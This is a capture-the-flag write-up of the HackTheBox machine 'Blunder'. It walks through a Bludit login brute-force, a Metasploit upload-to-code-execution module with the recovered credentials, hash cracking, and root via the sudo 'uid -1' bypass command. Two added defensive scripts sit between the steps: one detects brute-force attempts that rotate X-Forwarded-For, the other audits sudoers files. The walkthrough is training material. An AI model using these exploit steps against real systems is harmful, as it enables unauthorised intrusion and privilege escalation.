HackTheBox — Blunder

Summary

Another Linux machine has been retired, with IP 10.10.10.191.

Let's get started!

Enumeration

Nmap

Just one port is open, 80, so nothing else of interest.

Web Enum

I tried to fuzz the directories with dirb and found the admin login page.

Exploit

When I looked at the page source, I found Bludit version 3.9.2.
So I tried to find any CVE for this version and found CVE-2019-16113 and CVE-2019-17240, plus a Python script to start a brute-force attack: Bruteforce

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
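The brute-force above succeeds because the lockout in this Bludit version keys on a client-controllable forwarded-IP header (the weakness tracked as CVE-2019-17240), so rotating that header resets the counter. From the defender's side, the useful check is to count failed logins by the TCP peer address the server actually saw, not by any forwarded header. The following is an example added to this write-up, not code from the original post or from Bludit; the log lines are constructed, the log format (combined log plus a quoted `X-Forwarded-For` field) is assumed, and it assumes a failed login re-renders the form with HTTP 200 while a successful one answers with a 302 redirect.

```python
"""Flag brute-force logins against /admin/login from web-server access logs,
grouping by the peer address rather than by X-Forwarded-For.
Added example; all log data below is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/admin/login"

# Assumed log format: combined log with an extra quoted X-Forwarded-For field.
LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<xff>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def is_failed_login(rec):
    # Assumption: a bad password re-renders the login form (200); a good one
    # redirects to the dashboard (302).
    return rec["method"] == "POST" and rec["path"] == LOGIN_PATH and rec["status"] == 200


def detect_bruteforce(log_text, threshold=10, window=timedelta(seconds=60)):
    """Return {peer: summary} for peers with `threshold` failed logins inside
    `window`. Grouping by peer defeats X-Forwarded-For rotation, and the
    count of distinct forwarded values is reported as supporting evidence."""
    failures = defaultdict(list)
    forwarded = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_failed_login(rec):
            failures[rec["peer"]].append(rec["ts"])
            forwarded[rec["peer"]].add(rec["xff"])
    alerts = {}
    for peer, stamps in failures.items():
        stamps.sort()
        # Sliding window over the sorted timestamps of this peer's failures.
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                alerts[peer] = {
                    "failures": len(stamps),
                    "distinct_forwarded_ips": len(forwarded[peer]),
                }
                break
    return alerts


def build_sample_log():
    """Constructed traffic: one peer rotating X-Forwarded-For on every failed
    POST, and one peer that mistypes once and then logs in normally."""
    base = datetime(2020, 6, 16, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{peer} - - [{ts}] "{method} {path} HTTP/1.1" {status} 3120 "{xff}"'

    def stamp(delta):
        return (base + delta).strftime("%d/%b/%Y:%H:%M:%S %z")

    lines = [
        fmt.format(peer="10.10.14.5", ts=stamp(timedelta(seconds=i)), method="POST",
                   path=LOGIN_PATH, status=200, xff=f"198.51.100.{i + 1}")
        for i in range(12)
    ]
    lines.append(fmt.format(peer="10.10.14.7", ts=stamp(timedelta(minutes=5)),
                            method="GET", path=LOGIN_PATH, status=200, xff="-"))
    lines.append(fmt.format(peer="10.10.14.7", ts=stamp(timedelta(minutes=5, seconds=5)),
                            method="POST", path=LOGIN_PATH, status=200, xff="-"))
    lines.append(fmt.format(peer="10.10.14.7", ts=stamp(timedelta(minutes=5, seconds=10)),
                            method="POST", path=LOGIN_PATH, status=302, xff="-"))
    return "\n".join(lines)


if __name__ == "__main__":
    for peer, info in detect_bruteforce(build_sample_log()).items():
        print(f"{peer}: {info['failures']} failed logins, "
              f"{info['distinct_forwarded_ips']} distinct X-Forwarded-For values")
```

Run against the constructed log, only the rotating peer is reported; a real deployment would feed the same function the actual access log and treat a high distinct-forwarded-IP count from one peer as the signature of a lockout bypass.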

We can find an exploit for the first CVE in Metasploit:

msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhost 10.10.10.191
rhost => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set rport 80
rport => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

Get user Access

I didn't find the user flag, but I found user credentials in users.php.

Now we have a password hash, so we need to crack it. I used hashcat with the rockyou.txt wordlist and got the password: Password120

Now I tried to get sudo access with these credentials.

Got the user flag!

Privilege Escalation

After some searching about (ALL, !root) /bin/bash, I found this link: https://n0w4n.nl/sudo-security-bypass/

So I tried to get root with the command: sudo -u#-1 /bin/bash
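The rule `(ALL, !root)` is a deny-list: it grants every run-as user and then excludes root by name. Affected sudo versions accept a numeric uid of -1 (or its unsigned form 4294967295), which matches neither `!root` nor `!#0`, and pass it to setresuid(), where -1 means "leave unchanged", so the process keeps the root privileges sudo already had. The fix is an explicit allow-list of the non-root run-as users actually needed, plus a sudo version that rejects uid -1. The following audit script is an example added to this write-up, not code from the original post or from the sudo project; the sudoers content is constructed, the user names in it are placeholders, and the parser handles only the common `user HOST=(runas) command` line shape.

```python
"""Audit sudoers text for 'run as anyone except root' grants such as
(ALL, !root), whose negation is bypassable on affected sudo versions.
Added example; the sudoers content below is constructed."""
import re

# Constructed sudoers file with placeholder user names (not the target's real file).
SAMPLE_SUDOERS = """\
# Comment lines and blank lines are ignored
Defaults env_reset

root     ALL=(ALL:ALL) ALL
webuser  ALL=(ALL, !root) /bin/bash
deploy   ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart nginx
ops      ALL=(ALL) /usr/bin/less
%admin   ALL=(ALL, !root, !#0) ALL
"""

# user_or_group  host = (runas_users[:runas_groups])  [tags:] command
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>.+)$'
)


def parse_rules(text):
    """Return (who, runas_users, command) for each user/group spec line."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # Runas spec is 'users[:groups]'; only the user list matters here.
        user_part = m["runas"].split(":")[0]
        runas_users = [u.strip() for u in user_part.split(",") if u.strip()]
        rules.append((m["who"], runas_users, m["cmd"].strip()))
    return rules


def is_negated_root_grant(runas_users):
    """True when the spec grants ALL run-as users and relies on excluding root
    (by name or as #0). A uid of -1 matches neither exclusion on affected
    sudo versions, so the deny-list does not hold."""
    allows_all = "ALL" in runas_users
    negations = {u for u in runas_users if u.startswith("!")}
    return allows_all and bool(negations & {"!root", "!#0"})


def audit_sudoers(text):
    """Return one finding per bypassable rule, with the recommended rewrite."""
    findings = []
    for who, runas, cmd in parse_rules(text):
        if is_negated_root_grant(runas):
            findings.append({
                "who": who,
                "runas": runas,
                "cmd": cmd,
                "fix": "replace the deny-list with an explicit Runas_List of the "
                       "non-root users needed, and update sudo to a version that "
                       "rejects uid -1",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['who']}: ({', '.join(f['runas'])}) {f['cmd']}\n  fix: {f['fix']}")
```

On the constructed file this flags `webuser` and `%admin` and leaves `deploy` alone, because `(www-data)` names exactly one run-as user instead of granting ALL and subtracting root. Pointing the script at `/etc/sudoers` and the files under `/etc/sudoers.d/` is a quick way to find the same pattern on a host before an attacker does.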

Got the root flag!

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

Ahmed Samir

CTFer | Computer Science Student